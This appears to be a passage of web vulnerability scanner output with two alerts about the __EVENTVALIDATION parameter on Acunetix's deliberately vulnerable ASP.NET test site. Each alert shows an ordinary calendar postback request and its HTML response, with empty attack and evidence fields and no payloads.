URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8441&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAwMD5CtsIZGRkqvuiyJ8nQFOaxeURw%2B5hfXVE1Oo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLR6MlxAtCnkuUEAtOn6sAIAo33qKkGAo33qKkGAuadu94JAuadu94JAuadr%2FUCAuadr%2FUCAuadw4kKAuadw4kKAuad96wDAuad96wDAuad68MMAuad68MMAuadn%2BYFAuadn%2BYFAuads70NAuads70NAuadp9AGAuadp9AGAuadm7kDAuadm7kDAuadj9wMAuadj9wMAvukmcUPAvukmcUPAvukjZgHAvukjZgHAvukoT8C%2B6ShPwL7pNXTCQL7pNXTCQL7pMn2AgL7pMn2AgL7pP2NCgL7pP2NCgL7pJGgAwL7pJGgAwL7pIXHDAL7pIXHDAL7pPmsCQL7pPmsCQL7pO3DAgL7pO3DAgLcy%2F%2FoBQLcy%2F%2FoBQLcy5OPDQLcy5OPDQLcy4eiBgLcy4eiBgLcy7v5DwLcy7v5DwLcy6%2BcBwLcy6%2BcBwLcy8MwAtzLwzAC3Mv31wkC3Mv31wkC3Mvr6gIC3Mvr6gIC3Mvf0w8C3Mvf0w8C3Mvz9ggC3Mvz9ggCsdLdnwoCsdLdnwoCsdLxsgMCsdLxsgMCsdLlyQwCsdLlyQwCsdKZ7AUCsdKZ7AUCsdKNgw0CsdKNgw0CsdKhpgYCsdKhpgYCsdLV%2Bg8CsdLV%2Bg8CsdLJkQcCsdLJkQcCsdK9%2BQUCsdK9%2BQUCsdLRnQ0CsdLRnQ0CivmjBQKK%2BaMF7DKPxSpEhjeut6v0g35yB8PPiS4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:10 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAwMD5CtsIZGRkqvuiyJ8nQFOaxeURw+5hfXVE1Oo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLR6MlxAtCnkuUEAtOn6sAIAo33qKkGAo33qKkGAuadu94JAuadu94JAuadr/UCAuadr/UCAuadw4kKAuadw4kKAuad96wDAuad96wDAuad68MMAuad68MMAuadn+YFAuadn+YFAuads70NAuads70NAuadp9AGAuadp9AGAuadm7kDAuadm7kDAuadj9wMAuadj9wMAvukmcUPAvukmcUPAvukjZgHAvukjZgHAvukoT8C+6ShPwL7pNXTCQL7pNXTCQL7pMn2AgL7pMn2AgL7pP2NCgL7pP2NCgL7pJGgAwL7pJGgAwL7pIXHDAL7pIXHDAL7pPmsCQL7pPmsCQL7pO3DAgL7pO3DAgLcy//oBQLcy//oBQLcy5OPDQLcy5OPDQLcy4eiBgLcy4eiBgLcy7v5DwLcy7v5DwLcy6+cBwLcy6+cBwLcy8MwAtzLwzAC3Mv31wkC3Mv31wkC3Mvr6gIC3Mvr6gIC3Mvf0w8C3Mvf0w8C3Mvz9ggC3Mvz9ggCsdLdnwoCsdLdnwoCsdLxsgMCsdLxsgMCsdLlyQwCsdLlyQwCsdKZ7AUCsdKZ7AUCsdKNgw0CsdKNgw0CsdKhpgYCsdKhpgYCsdLV+g8CsdLV+g8CsdLJkQcCsdLJkQcCsdK9+QUCsdK9+QUCsdLRnQ0CsdLRnQ0CivmjBQKK+aMF7DKPxSpEhjeut6v0g35yB8PPiS4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:White" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8355&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAOYFlx9oIZGRkd%2Fitp7kchQsBJXr9A8x8Wj7rhC0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLRn7CbCwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2B0x5mlUb3bp8nMoAnmkFE9BiUvc
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:15 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAOYFlx9oIZGRkd/itp7kchQsBJXr9A8x8Wj7rhC0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLRn7CbCwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+0x5mlUb3bp8nMoAnmkFE9BiUvc" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:White" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> 